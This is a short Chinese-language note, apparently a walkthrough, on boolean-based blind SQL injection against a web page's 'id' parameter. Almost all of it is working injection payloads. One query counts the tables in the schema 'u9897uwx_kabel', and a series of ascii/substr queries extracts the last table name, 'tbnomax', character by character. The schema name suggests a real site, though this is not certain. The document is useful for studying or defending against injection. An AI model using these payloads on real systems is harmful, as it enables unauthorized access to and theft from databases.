主页面无论输入什么都不显示错误,进去下面这个页面,会有报错信息。
联合查询、报错两种方法爆出来的表不完整,,所以用布尔型盲注的方法。
/?id=24 and (select count(table_name) from information_schema.tables where table_schema='u9897uwx_kabel') =22 %23 //22张表
/?id=24 and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),1,1))=116%23 t
/?id=24 and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),2,1))=98%23 b
/?id=24 and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),3,1))=110%23 n
/?id=24 and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),4,1))=111%23 o
/?id=24 and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),5,1))=109%23 m
/?id=24 and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),6,1))=97%23 a
/?id=24 and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),7,1))=120%23 x
/?id=24 and ascii(substr((select table_name from information_schema.tables where table_schema='u9897uwx_kabel' limit 21,1),8,1))=0%23 //空格,说明表的名字已经爆完了
数据库最后一张表为 tbnomax